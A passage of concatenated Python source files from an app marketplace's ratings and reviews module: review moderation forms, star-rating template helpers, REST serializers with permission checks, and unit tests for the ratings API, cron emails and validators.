body=unicode(review.body),
addon_id=addon.id,
addon_title=unicode(addon.name),
is_flagged=is_flagged))
if self.request:
ReviewerScore.award_moderation_points(
self.request.amo_user, addon, review_id)
elif action == REVIEW_MODERATE_KEEP:
review.editorreview = False
review.save()
amo.log(amo.LOG.APPROVE_REVIEW, review.addon, review,
details=dict(title=unicode(review.title),
body=unicode(review.body),
addon_id=addon.id,
addon_title=unicode(addon.name),
is_flagged=is_flagged))
if self.request:
ReviewerScore.award_moderation_points(
self.request.amo_user, addon, review.id)
class ModerateReviewFlagForm(happyforms.ModelForm):
action_choices = [
(REVIEW_MODERATE_KEEP, _lazy(u'Keep review; remove flags')),
(REVIEW_MODERATE_SKIP, _lazy(u'Skip for now')),
(REVIEW_MODERATE_DELETE, _lazy(u'Delete review'))]
action = forms.ChoiceField(choices=action_choices, required=False,
initial=0, widget=forms.RadioSelect())
class Meta:
model = Review
fields = ('action',)
ReviewFlagFormSet = modelformset_factory(Review, extra=0,
form=ModerateReviewFlagForm,
formset=BaseReviewFlagFormSet)
########NEW FILE########
__FILENAME__ = helpers
import jingo
import jinja2
from tower import ugettext as _
from access import acl
@jingo.register.filter
def stars(num, large=False):
# check for 0.0 incase None was cast to a float. Should
# be safe since lowest rating you can give is 1.0
if num is None or num == 0.0:
return _('Not yet rated')
else:
num = min(5, int(round(num)))
t = jingo.env.get_template('reviews/impala/reviews_rating.html')
# These are getting renamed for contextual sense in the template.
return jinja2.Markup(t.render({'rating': num, 'detailpage': large}))
@jingo.register.function
def impala_reviews_link(addon):
t = jingo.env.get_template('reviews/impala/reviews_link.html')
return jinja2.Markup(t.render({'addon': addon}))
def user_can_delete_review(request, review):
"""Return whether or not the request.user can delete reviews.
People who can delete reviews:
* The original review author.
* Editors, but only if they aren't listed as an author of the add-on.
* Users in a group with "Users:Edit" privileges.
* Users in a group with "Addons:Edit" privileges.
TODO: Make this more granular when we have multiple reviewer types, e.g.
persona reviewers shouldn't be able to delete add-on reviews.
"""
is_editor = acl.check_reviewer(request)
is_author = review.addon.has_author(request.user)
return (
review.user_id == request.user.id or
not is_author and (
is_editor or
acl.action_allowed(request, 'Users', 'Edit') or
acl.action_allowed(request, 'Addons', 'Edit')))
########NEW FILE########
__FILENAME__ = serializers
from django.core.urlresolvers import reverse
from rest_framework import serializers
from rest_framework.exceptions import PermissionDenied
from reviews.models import Review, ReviewFlag
from mkt.account.serializers import AccountSerializer
from mkt.api.fields import SlugOrPrimaryKeyRelatedField, SplitField
from mkt.api.exceptions import Conflict
from mkt.regions import get_region
from mkt.versions.serializers import SimpleVersionSerializer
from mkt.webapps.models import Webapp
class RatingSerializer(serializers.ModelSerializer):
app = SplitField(
SlugOrPrimaryKeyRelatedField(slug_field='app_slug',
queryset=Webapp.objects.all(),
source='addon'),
serializers.HyperlinkedRelatedField(view_name='app-detail',
read_only=True, source='addon'))
body = serializers.CharField()
user = AccountSerializer(read_only=True)
report_spam = serializers.SerializerMethodField('get_report_spam_link')
resource_uri = serializers.HyperlinkedIdentityField(
view_name='ratings-detail')
is_author = serializers.SerializerMethodField('get_is_author')
has_flagged = serializers.SerializerMethodField('get_has_flagged')
version = SimpleVersionSerializer(read_only=True)
class Meta:
model = Review
fields = ('app', 'body', 'created', 'has_flagged', 'is_author',
'modified', 'rating', 'report_spam', 'resource_uri', 'user',
'version')
def __init__(self, *args, **kwargs):
super(RatingSerializer, self).__init__(*args, **kwargs)
if 'request' in self.context:
self.request = self.context['request']
else:
self.request = None
if not self.request or not self.request.amo_user:
self.fields.pop('is_author')
self.fields.pop('has_flagged')
if self.request and self.request.method in ('PUT', 'PATCH'):
# Don't let users modify 'app' field at edit time
self.fields['app'].read_only = True
def get_report_spam_link(self, obj):
return reverse('ratings-flag', kwargs={'pk': obj.pk})
def get_is_author(self, obj):
return obj.user.pk == self.request.amo_user.pk
def get_has_flagged(self, obj):
return (not self.get_is_author(obj) and
obj.reviewflag_set.filter(user=self.request.amo_user).exists())
def validate(self, attrs):
if not getattr(self, 'object'):
# If we are creating a rating, then we need to do various checks on
# the app. Because these checks need the version as well, we have
# to do them here and not in validate_app().
# Assign user and ip_address. It won't change once the review is
# created.
attrs['user'] = self.request.amo_user
attrs['ip_address'] = self.request.META.get('REMOTE_ADDR', '')
# If the app is packaged, add in the current version.
if attrs['addon'].is_packaged:
attrs['version'] = attrs['addon'].current_version
# Return 409 if the user has already reviewed this app.
app = attrs['addon']
amo_user = self.request.amo_user
qs = self.context['view'].queryset.filter(addon=app, user=amo_user)
if app.is_packaged:
qs = qs.filter(version=attrs['version'])
if qs.exists():
raise Conflict('You have already reviewed this app.')
# Return 403 is the app is not public.
if not app.is_public():
raise PermissionDenied('The app requested is not public.')
# Return 403 if the user is attempting to review their own app.
if app.has_author(amo_user):
raise PermissionDenied('You may not review your own app.')
# Return 403 if not a free app and the user hasn't purchased it.
if app.is_premium() and not app.is_purchased(amo_user):
raise PermissionDenied("You may not review paid apps you "
"haven't purchased.")
# Return 403 if the app is not available in the current region.
current_region = get_region()
if not app.listed_in(region=current_region):
raise PermissionDenied('App not available in region "%s".' %
current_region.slug)
return attrs
def validate_app(self, attrs, source):
# Don't allow users to change the app on an existing rating.
if getattr(self, 'object'):
attrs[source] = self.object.addon
return attrs
class RatingFlagSerializer(serializers.ModelSerializer):
user = serializers.Field()
review_id = serializers.Field()
class Meta:
model = ReviewFlag
fields = ('review_id', 'flag', 'note', 'user')
def validate(self, attrs):
attrs['user'] = self.context['request'].amo_user
attrs['review_id'] = self.context['view'].kwargs['review']
if 'note' in attrs and attrs['note'].strip():
attrs['flag'] = ReviewFlag.OTHER
if ReviewFlag.objects.filter(review_id=attrs['review_id'],
user=attrs['user']).exists():
raise Conflict('You have already flagged this review.')
return attrs
########NEW FILE########
__FILENAME__ = test_cron
# -*- coding: utf-8 -*-
import datetime
from django.conf import settings
from django.core import mail
from django.utils.encoding import smart_str
import mock
from nose.tools import eq_
from addons.models import AddonUser
import amo.tests
from mkt.ratings.cron import email_daily_ratings
from reviews.models import Review
from users.models import UserProfile
@mock.patch.object(settings, 'SEND_REAL_EMAIL', True)
class TestEmailDailyRatings(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.app = amo.tests.app_factory(name='test')
self.app2 = amo.tests.app_factory(name='test2')
self.user = UserProfile.objects.get(username='regularuser')
AddonUser.objects.create(addon=self.app, user=self.user)
AddonUser.objects.create(addon=self.app2, user=self.user)
yesterday = datetime.datetime.today() - datetime.timedelta(1)
# Create one review for app, two reviews for app2.
self.app1_review = Review.objects.create(
addon=self.app, user=self.user, rating=1,
body='sux, I want my money back.')
self.app1_review.update(created=yesterday)
self.app2_review = Review.objects.create(
addon=self.app2, user=self.user, rating=4,
body='waste of two seconds of my life.')
self.app2_review.update(created=yesterday)
self.app2_review2 = Review.objects.create(
addon=self.app2, user=self.user, rating=5,
body='a++ would play again')
self.app2_review2.update(created=yesterday)
def test_emails_goes_out(self):
# Test first email have one rating, second email has two ratings.
email_daily_ratings()
eq_(len(mail.outbox), 2)
eq_(mail.outbox[0].to, [self.user.email])
eq_(mail.outbox[1].to, [self.user.email])
eq_(str(self.app1_review.body) in smart_str(mail.outbox[0].body), True)
eq_(str(self.app2_review.body) in smart_str(mail.outbox[1].body), True)
eq_(str(self.app2_review2.body) in smart_str(mail.outbox[1].body),
True)
eq_(str(self.app2_review.body) not in smart_str(mail.outbox[0].body),
True)
eq_(str(self.app2_review.body) not in smart_str(mail.outbox[0].body),
True)
########NEW FILE########
__FILENAME__ = test_helpers
from nose.tools import eq_
import jingo
from pyquery import PyQuery as pq
def setup():
jingo.load_helpers()
def render(s, context={}):
t = jingo.env.from_string(s)
return t.render(context)
def test_stars():
s = render('{{ num|stars }}', {'num': None})
eq_(s, 'Not yet rated')
doc = pq(render('{{ num|stars }}', {'num': 1}))
msg = 'Rated 1 out of 5 stars'
eq_(doc.attr('class'), 'stars stars-1')
eq_(doc.attr('title'), msg)
eq_(doc.text(), msg)
def test_stars_details_page():
doc = pq(render('{{ num|stars(large=True) }}', {'num': 2}))
eq_(doc('.stars').attr('class'), 'stars large stars-2')
def test_stars_max():
doc = pq(render('{{ num|stars }}', {'num': 5.3}))
eq_(doc.attr('class'), 'stars stars-5')
########NEW FILE########
__FILENAME__ = test_models
from django.utils import translation
from nose.tools import eq_
import test_utils
import amo.tests
from reviews.models import check_spam, Review, Spam
class TestReviewModel(amo.tests.TestCase):
fixtures = ['base/apps', 'base/platforms', 'reviews/test_models']
def test_translations(self):
translation.activate('en-US')
# There's en-US and de translations. We should get en-US.
r1 = Review.objects.get(id=1)
test_utils.trans_eq(r1.title, 'r1 title en', 'en-US')
# There's only a de translation, so we get that.
r2 = Review.objects.get(id=2)
test_utils.trans_eq(r2.title, 'r2 title de', 'de')
translation.activate('de')
# en and de exist, we get de.
r1 = Review.objects.get(id=1)
test_utils.trans_eq(r1.title, 'r1 title de', 'de')
# There's only a de translation, so we get that.
r2 = Review.objects.get(id=2)
test_utils.trans_eq(r2.title, 'r2 title de', 'de')
class TestSpamTest(amo.tests.TestCase):
fixtures = ['base/apps', 'base/platforms', 'reviews/test_models']
def test_create_not_there(self):
Review.objects.all().delete()
eq_(Review.objects.count(), 0)
check_spam(1)
def test_add(self):
assert Spam().add(Review.objects.all()[0], 'numbers')
########NEW FILE########
__FILENAME__ = test_validators
from django.core.exceptions import ValidationError
import amo.tests
from mkt.ratings.validators import validate_rating
class TestValidateRating(amo.tests.TestCase):
def test_valid(self):
for value in [1, 2, 3, 4, 5]:
validate_rating(value)
def test_invalid(self):
for value in [-4, 0, 3.5, 6]:
with self.assertRaises(ValidationError):
validate_rating(value)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
from datetime import datetime
import json
from urlparse import urlparse
from django.core.urlresolvers import reverse
from django.http import QueryDict
from mock import patch
from nose.tools import eq_, ok_
import amo
from addons.models import AddonUser
from devhub.models import ActivityLog
from reviews.models import Review, ReviewFlag
from users.models import UserProfile
import mkt.regions
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import AddonExcludedRegion, Webapp
from mkt.prices.models import AddonPurchase
class TestRatingResource(RestOAuth, amo.tests.AMOPaths):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestRatingResource, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=2519)
self.user2 = UserProfile.objects.get(pk=31337)
self.list_url = reverse('ratings-list')
def _get_url(self, url, client=None, **kwargs):
if client is None:
client = self.client
res = client.get(url, kwargs)
data = json.loads(res.content)
return res, data
def _get_filter(self, client=None, expected_status=200, **params):
res, data = self._get_url(self.list_url, client=client, **params)
eq_(res.status_code, expected_status)
if expected_status == 200:
eq_(len(data['objects']), 1)
return res, data
def test_has_cors(self):
self.assertCORS(self.client.get(self.list_url),
'get', 'post', 'put', 'delete')
def test_options(self):
res = self.anon.options(self.list_url)
eq_(res.status_code, 200)
data = json.loads(res.content)
ok_('application/json' in data['renders'])
ok_('application/json' in data['parses'])
def test_get_empty_with_app(self):
AddonUser.objects.create(user=self.user, addon=self.app)
res, data = self._get_url(self.list_url, app=self.app.pk)
eq_(res.status_code, 200)
eq_(data['info']['average'], self.app.average_rating)
eq_(data['info']['slug'], self.app.app_slug)
assert not data['user']['can_rate']
assert not data['user']['has_rated']
def test_get(self):
first_version = self.app.current_version
rev = Review.objects.create(addon=self.app, user=self.user,
version=first_version,
body=u'I lôve this app',
rating=5)
pk = rev.pk
ver = amo.tests.version_factory(addon=self.app, version='2.0',
file_kw=dict(status=amo.STATUS_PUBLIC))
self.app.update_version()
res, data = self._get_url(self.list_url, app=self.app.pk)
eq_(data['info']['average'], self.app.average_rating)
eq_(data['info']['slug'], self.app.app_slug)
eq_(data['info']['current_version'], ver.version)
eq_(data['user']['can_rate'], True)
eq_(data['user']['has_rated'], True)
eq_(len(data['objects']), 1)
self.assertApiUrlEqual(data['objects'][0]['app'], '/apps/app/337141/')
eq_(data['objects'][0]['body'], rev.body)
self.assertCloseToNow(data['objects'][0]['created'], now=rev.created)
eq_(data['objects'][0]['is_author'], True)
self.assertCloseToNow(data['objects'][0]['modified'], now=rev.modified)
eq_(data['objects'][0]['rating'], rev.rating)
eq_(data['objects'][0]['report_spam'],
reverse('ratings-flag', kwargs={'pk': pk}))
eq_(data['objects'][0]['resource_uri'],
reverse('ratings-detail', kwargs={'pk': pk}))
eq_(data['objects'][0]['user']['display_name'], self.user.display_name)
eq_(data['objects'][0]['version']['version'], first_version.version)
eq_(data['objects'][0]['version']['resource_uri'],
reverse('version-detail', kwargs={'pk': first_version.pk}))
def test_is_flagged_false(self):
Review.objects.create(addon=self.app, user=self.user2, body='yes')
res, data = self._get_url(self.list_url, app=self.app.pk)
eq_(data['objects'][0]['is_author'], False)
eq_(data['objects'][0]['has_flagged'], False)
def test_is_flagged_is_author(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
res, data = self._get_url(self.list_url, app=self.app.pk)
eq_(data['objects'][0]['is_author'], True)
eq_(data['objects'][0]['has_flagged'], False)
def test_is_flagged_true(self):
rat = Review.objects.create(addon=self.app, user=self.user2, body='ah')
ReviewFlag.objects.create(review=rat, user=self.user,
flag=ReviewFlag.SPAM)
res, data = self._get_url(self.list_url, app=self.app.pk)
eq_(data['objects'][0]['is_author'], False)
eq_(data['objects'][0]['has_flagged'], True)
def test_get_detail(self):
fmt = '%Y-%m-%dT%H:%M:%S'
Review.objects.create(addon=self.app, user=self.user2, body='no')
rev = Review.objects.create(addon=self.app, user=self.user, body='yes')
url = reverse('ratings-detail', kwargs={'pk': rev.pk})
res, data = self._get_url(url)
self.assertCloseToNow(datetime.strptime(data['modified'], fmt))
self.assertCloseToNow(datetime.strptime(data['created'], fmt))
eq_(data['body'], 'yes')
def test_filter_self(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
Review.objects.create(addon=self.app, user=self.user2, body='no')
self._get_filter(user=self.user.pk)
def test_filter_mine(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
Review.objects.create(addon=self.app, user=self.user2, body='no')
self._get_filter(user='mine')
def test_filter_mine_anonymous(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
self._get_filter(user='mine', client=self.anon, expected_status=403)
def test_filter_by_app_slug(self):
self.app2 = amo.tests.app_factory()
Review.objects.create(addon=self.app2, user=self.user, body='no')
Review.objects.create(addon=self.app, user=self.user, body='yes')
res, data = self._get_filter(app=self.app.app_slug)
eq_(data['info']['slug'], self.app.app_slug)
eq_(data['info']['current_version'], self.app.current_version.version)
def test_filter_by_app_pk(self):
self.app2 = amo.tests.app_factory()
Review.objects.create(addon=self.app2, user=self.user, body='no')
Review.objects.create(addon=self.app, user=self.user, body='yes')
res, data = self._get_filter(app=self.app.pk)
eq_(data['info']['slug'], self.app.app_slug)
eq_(data['info']['current_version'], self.app.current_version.version)
def test_filter_by_invalid_app(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
self._get_filter(app='wrongslug', expected_status=404)
self._get_filter(app=2465478, expected_status=404)
@patch('mkt.ratings.views.get_region')
def test_filter_by_nonpublic_app(self, get_region_mock):
Review.objects.create(addon=self.app, user=self.user, body='yes')
self.app.update(status=amo.STATUS_PENDING)
get_region_mock.return_value = mkt.regions.US
res, data = self._get_filter(app=self.app.app_slug, expected_status=403)
eq_(data['detail'], 'The app requested is not public or not available '
'in region "us".')
def test_filter_by_nonpublic_app_admin(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
self.grant_permission(self.user, 'Addons:Edit')
self.app.update(status=amo.STATUS_PENDING)
self._get_filter(app=self.app.app_slug)
def test_filter_by_nonpublic_app_owner(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
AddonUser.objects.create(user=self.user, addon=self.app)
self.app.update(status=amo.STATUS_PENDING)
self._get_filter(app=self.app.app_slug)
@patch('mkt.ratings.views.get_region')
def test_filter_by_app_excluded_in_region(self, get_region_mock):
Review.objects.create(addon=self.app, user=self.user, body='yes')
AddonExcludedRegion.objects.create(addon=self.app,
region=mkt.regions.BR.id)
get_region_mock.return_value = mkt.regions.BR
res, data = self._get_filter(app=self.app.app_slug, expected_status=403)
eq_(data['detail'], 'The app requested is not public or not available '
'in region "br".')
@patch('mkt.ratings.views.get_region')
def test_filter_by_app_excluded_in_region_admin(self, get_region_mock):
Review.objects.create(addon=self.app, user=self.user, body='yes')
self.grant_permission(self.user, 'Addons:Edit')
AddonExcludedRegion.objects.create(addon=self.app,
region=mkt.regions.BR.id)
get_region_mock.return_value = mkt.regions.BR
self._get_filter(app=self.app.app_slug)
@patch('mkt.ratings.views.get_region')
def test_filter_by_app_excluded_in_region_owner(self, get_region_mock):
Review.objects.create(addon=self.app, user=self.user, body='yes')
AddonUser.objects.create(user=self.user, addon=self.app)
AddonExcludedRegion.objects.create(addon=self.app,
region=mkt.regions.BR.id)
get_region_mock.return_value = mkt.regions.BR
self._get_filter(app=self.app.app_slug)
def test_anonymous_get_list_without_app(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
res, data = self._get_url(self.list_url, client=self.anon)
eq_(res.status_code, 200)
assert not 'user' in data
eq_(len(data['objects']), 1)
eq_(data['objects'][0]['body'], 'yes')
def test_get_list_only_apps(self):
addon = amo.tests.addon_factory()
Review.objects.create(addon=addon, user=self.user, body='no')
res, data = self._get_url(self.list_url, client=self.anon)
eq_(res.status_code, 200)
eq_(len(data['objects']), 0)
def test_get_detail_only_apps(self):
addon = amo.tests.addon_factory()
Review.objects.create(addon=addon, user=self.user, body='no')
res, data = self._get_url(self.list_url, app=addon.pk)
eq_(res.status_code, 404)
def test_anonymous_get_list_app(self):
res, data = self._get_url(self.list_url, app=self.app.app_slug,
client=self.anon)
eq_(res.status_code, 200)
eq_(data['user'], None)
def test_non_owner(self):
res, data = self._get_url(self.list_url, app=self.app.app_slug)
assert data['user']['can_rate']
assert not data['user']['has_rated']
def test_can_rate_unpurchased(self):
self.app.update(premium_type=amo.ADDON_PREMIUM)
res, data = self._get_url(self.list_url, app=self.app.app_slug)
assert not res.json['user']['can_rate']
def test_can_rate_purchased(self):
self.app.update(premium_type=amo.ADDON_PREMIUM)
AddonPurchase.objects.create(addon=self.app, user=self.user)
res, data = self._get_url(self.list_url, app=self.app.app_slug)
assert res.json['user']['can_rate']
def test_isowner_true(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
res, data = self._get_url(self.list_url, app=self.app.app_slug)
data = json.loads(res.content)
eq_(data['objects'][0]['is_author'], True)
def test_isowner_false(self):
Review.objects.create(addon=self.app, user=self.user2, body='yes')
res, data = self._get_url(self.list_url, app=self.app.app_slug)
data = json.loads(res.content)
eq_(data['objects'][0]['is_author'], False)
def test_isowner_anonymous(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
res, data = self._get_url(self.list_url, app=self.app.app_slug,
client=self.anon)
data = json.loads(res.content)
self.assertNotIn('is_author', data['objects'][0])
def test_already_rated(self):
Review.objects.create(addon=self.app, user=self.user, body='yes')
res, data = self._get_url(self.list_url, app=self.app.app_slug)
data = json.loads(res.content)
assert data['user']['can_rate']
assert data['user']['has_rated']
def test_already_rated_version(self):
self.app.update(is_packaged=True)
Review.objects.create(addon=self.app, user=self.user, body='yes')
amo.tests.version_factory(addon=self.app, version='3.0')
self.app.update_version()
res, data = self._get_url(self.list_url, app=self.app.app_slug)
data = json.loads(res.content)
assert data['user']['can_rate']
assert not data['user']['has_rated']
def _create(self, data=None, anonymous=False):
default_data = {
'app': self.app.id,
'body': 'Rocking the free web.',
'rating': 5,
'version': self.app.current_version.id
}
if data:
default_data.update(data)
json_data = json.dumps(default_data)
client = self.anon if anonymous else self.client
res = client.post(self.list_url, data=json_data)
try:
res_data = json.loads(res.content)
except ValueError:
res_data = res.content
return res, res_data
def test_anonymous_create_fails(self):
res, data = self._create(anonymous=True)
eq_(res.status_code, 403)
@patch('mkt.ratings.views.record_action')
def test_create(self, record_action):
log_review_id = amo.LOG.ADD_REVIEW.id
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 0)
res, data = self._create()
eq_(201, res.status_code)
pk = Review.objects.latest('pk').pk
eq_(data['body'], 'Rocking the free web.')
eq_(data['rating'], 5)
eq_(data['resource_uri'], reverse('ratings-detail', kwargs={'pk': pk}))
eq_(data['report_spam'], reverse('ratings-flag', kwargs={'pk': pk}))
eq_(record_action.call_count, 1)
eq_(record_action.call_args[0][0], 'new-review')
eq_(record_action.call_args[0][2], {'app-id': 337141})
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
return res, data
def test_create_packaged(self):
self.app.update(is_packaged=True)
res, data = self.test_create()
eq_(data['version']['version'], '1.0')
def test_create_bad_data(self):
res, data = self._create({'body': None})
eq_(400, res.status_code)
assert 'body' in data
def test_create_nonexistent_app(self):
res, data = self._create({'app': -1})
eq_(400, res.status_code)
assert 'app' in data
@patch('mkt.ratings.serializers.get_region')
def test_create_for_nonregion(self, get_region_mock):
AddonExcludedRegion.objects.create(addon=self.app,
region=mkt.regions.BR.id)
get_region_mock.return_value = mkt.regions.BR
res, data = self._create()
eq_(403, res.status_code)
def test_create_for_nonpublic(self):
self.app.update(status=amo.STATUS_PENDING)
res, data = self._create()
eq_(403, res.status_code)
def test_create_duplicate_rating(self):
self._create()
res, data = self._create()
eq_(409, res.status_code)
def test_new_rating_for_new_version(self):
self.app.update(is_packaged=True)
self._create()
version = amo.tests.version_factory(addon=self.app, version='3.0')
self.app.update_version()
eq_(self.app.reload().current_version, version)
res, data = self._create()
eq_(201, res.status_code)
eq_(data['version']['version'], '3.0')
def test_create_duplicate_rating_packaged(self):
self.app.update(is_packaged=True)
self._create()
res, data = self._create()
eq_(409, res.status_code)
def test_create_own_app(self):
AddonUser.objects.create(user=self.user, addon=self.app)
res, data = self._create()
eq_(403, res.status_code)
def test_rate_unpurchased_premium(self):
self.app.update(premium_type=amo.ADDON_PREMIUM)
res, data = self._create()
eq_(403, res.status_code)
def test_rate_purchased_premium(self):
self.app.update(premium_type=amo.ADDON_PREMIUM)
AddonPurchase.objects.create(addon=self.app, user=self.user)
res, data = self._create()
eq_(201, res.status_code)
def _create_default_review(self):
# Create the original review
default_data = {
'body': 'Rocking the free web.',
'rating': 5
}
res, res_data = self._create(default_data)
return res, res_data
def test_patch_not_implemented(self):
self._create_default_review()
pk = Review.objects.latest('id').pk
json_data = json.dumps({
'body': 'Totally rocking the free web.',
})
res = self.client.patch(reverse('ratings-detail', kwargs={'pk': pk}),
data=json_data)
# Should return a 405 but permission check is done first. It's fine.
eq_(res.status_code, 403)
def _update(self, updated_data, pk=None):
# Update the review
if pk is None:
pk = Review.objects.latest('id').pk
json_data = json.dumps(updated_data)
res = self.client.put(reverse('ratings-detail', kwargs={'pk': pk}),
data=json_data)
try:
res_data = json.loads(res.content)
except ValueError:
res_data = res.content
return res, res_data
def test_update(self):
rev = Review.objects.create(addon=self.app, user=self.user,
body='abcd', ip_address='1.2.3.4')
new_data = {
'body': 'Totally rocking the free web.',
'rating': 4,
}
log_review_id = amo.LOG.EDIT_REVIEW.id
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 0)
res, data = self._update(new_data)
eq_(res.status_code, 200)
eq_(data['body'], new_data['body'])
eq_(data['rating'], new_data['rating'])
rev.reload()
eq_(rev.body, new_data['body'])
eq_(rev.rating, new_data['rating'])
eq_(rev.user, self.user)
eq_(rev.ip_address, '1.2.3.4')
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
def test_update_admin(self):
self.grant_permission(self.user, 'Apps:Edit')
rev = Review.objects.create(addon=self.app, user=self.user2,
body='abcd', ip_address='1.2.3.4')
new_data = {
'body': 'Edited by admin',
'rating': 1,
}
log_review_id = amo.LOG.EDIT_REVIEW.id
res = self.client.put(reverse('ratings-detail', kwargs={'pk': rev.pk}),
json.dumps(new_data))
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['body'], new_data['body'])
eq_(data['rating'], new_data['rating'])
rev.reload()
eq_(rev.body, new_data['body'])
eq_(rev.rating, new_data['rating'])
eq_(rev.user, self.user2)
eq_(rev.ip_address, '1.2.3.4')
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
def test_update_bad_data(self):
self._create_default_review()
res, data = self._update({'body': None})
eq_(400, res.status_code)
assert 'body' in data
def test_update_change_app(self):
_, previous_data = self._create_default_review()
self.app2 = amo.tests.app_factory()
new_data = {
'body': 'Totally rocking the free web.',
'rating': 4,
'app': self.app2.pk
}
res, data = self._update(new_data)
eq_(res.status_code, 200)
eq_(data['body'], new_data['body'])
eq_(data['rating'], new_data['rating'])
eq_(data['app'], previous_data['app'])
def test_update_comment_not_mine(self):
rev = Review.objects.create(addon=self.app, user=self.user2,
body='yes')
res = self.client.put(reverse('ratings-detail', kwargs={'pk': rev.pk}),
json.dumps({'body': 'no', 'rating': 1}))
eq_(res.status_code, 403)
rev.reload()
eq_(rev.body, 'yes')
def test_delete_app_mine(self):
AddonUser.objects.filter(addon=self.app).update(user=self.user)
rev = Review.objects.create(addon=self.app, user=self.user2,
body='yes')
url = reverse('ratings-detail', kwargs={'pk': rev.pk})
res = self.client.delete(url)
eq_(res.status_code, 204)
eq_(Review.objects.count(), 0)
log_review_id = amo.LOG.DELETE_REVIEW.id
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
def test_delete_comment_mine(self):
rev = Review.objects.create(addon=self.app, user=self.user, body='yes')
url = reverse('ratings-detail', kwargs={'pk': rev.pk})
res = self.client.delete(url)
eq_(res.status_code, 204)
eq_(Review.objects.count(), 0)
log_review_id = amo.LOG.DELETE_REVIEW.id
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
def test_delete_addons_admin(self):
self.grant_permission(self.user, 'Apps:Edit')
rev = Review.objects.create(addon=self.app, user=self.user2,
body='yes')
url = reverse('ratings-detail', kwargs={'pk': rev.pk})
res = self.client.delete(url)
eq_(res.status_code, 204)
eq_(Review.objects.count(), 0)
log_review_id = amo.LOG.DELETE_REVIEW.id
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
def test_delete_users_admin(self):
self.grant_permission(self.user, 'Users:Edit')
rev = Review.objects.create(addon=self.app, user=self.user2,
body='yes')
url = reverse('ratings-detail', kwargs={'pk': rev.pk})
res = self.client.delete(url)
eq_(res.status_code, 204)
eq_(Review.objects.count(), 0)
log_review_id = amo.LOG.DELETE_REVIEW.id
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
def test_delete_not_mine(self):
rev = Review.objects.create(addon=self.app, user=self.user2,
body='yes')
url = reverse('ratings-detail', kwargs={'pk': rev.pk})
self.app.authors.clear()
res = self.client.delete(url)
eq_(res.status_code, 403)
eq_(Review.objects.count(), 1)
log_review_id = amo.LOG.DELETE_REVIEW.id
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 0)
def test_delete_not_there(self):
url = reverse('ratings-detail', kwargs={'pk': 123})
res = self.client.delete(url)
eq_(res.status_code, 404)
log_review_id = amo.LOG.DELETE_REVIEW.id
eq_(ActivityLog.objects.filter(action=log_review_id).count(), 0)
class TestRatingResourcePagination(RestOAuth, amo.tests.AMOPaths):
fixtures = fixture('user_2519', 'user_999', 'webapp_337141')
def setUp(self):
super(TestRatingResourcePagination, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=2519)
self.user2 = UserProfile.objects.get(pk=31337)
self.user3 = UserProfile.objects.get(pk=999)
self.url = reverse('ratings-list')
def test_pagination(self):
first_version = self.app.current_version
rev1 = Review.objects.create(addon=self.app, user=self.user,
version=first_version,
body=u'I häte this app',
rating=0)
rev2 = Review.objects.create(addon=self.app, user=self.user2,
version=first_version,
body=u'I lôve this app',
rating=5)
rev3 = Review.objects.create(addon=self.app, user=self.user3,
version=first_version,
body=u'Blurp.',
rating=3)
rev1.update(created=self.days_ago(3))
rev2.update(created=self.days_ago(2))
res = self.client.get(self.url, {'limit': 2})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 2)
eq_(data['objects'][0]['body'], rev3.body)
eq_(data['objects'][1]['body'], rev2.body)
eq_(data['meta']['total_count'], 3)
eq_(data['meta']['limit'], 2)
eq_(data['meta']['previous'], None)
eq_(data['meta']['offset'], 0)
next = urlparse(data['meta']['next'])
eq_(next.path, self.url)
eq_(QueryDict(next.query).dict(), {u'limit': u'2', u'offset': u'2'})
res = self.client.get(self.url, {'limit': 2, 'offset': 2})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
eq_(data['objects'][0]['body'], rev1.body)
eq_(data['meta']['total_count'], 3)
eq_(data['meta']['limit'], 2)
prev = urlparse(data['meta']['previous'])
eq_(next.path, self.url)
eq_(QueryDict(prev.query).dict(), {u'limit': u'2', u'offset': u'0'})
eq_(data['meta']['offset'], 2)
eq_(data['meta']['next'], None)
def test_total_count(self):
self.app.update(total_reviews=10)
res = self.client.get(self.url)
data = json.loads(res.content)
# We know we have no results, total_reviews isn't used.
eq_(data['meta']['total_count'], 0)
Review.objects.create(addon=self.app, user=self.user,
version=self.app.current_version,
body=u'I häte this app',
rating=0)
self.app.update(total_reviews=10)
res = self.client.get(self.url)
data = json.loads(res.content)
eq_(data['meta']['total_count'], 10)
class TestReviewFlagResource(RestOAuth, amo.tests.AMOPaths):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestReviewFlagResource, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=2519)
self.user2 = UserProfile.objects.get(pk=31337)
self.rating = Review.objects.create(addon=self.app,
user=self.user2, body='yes')
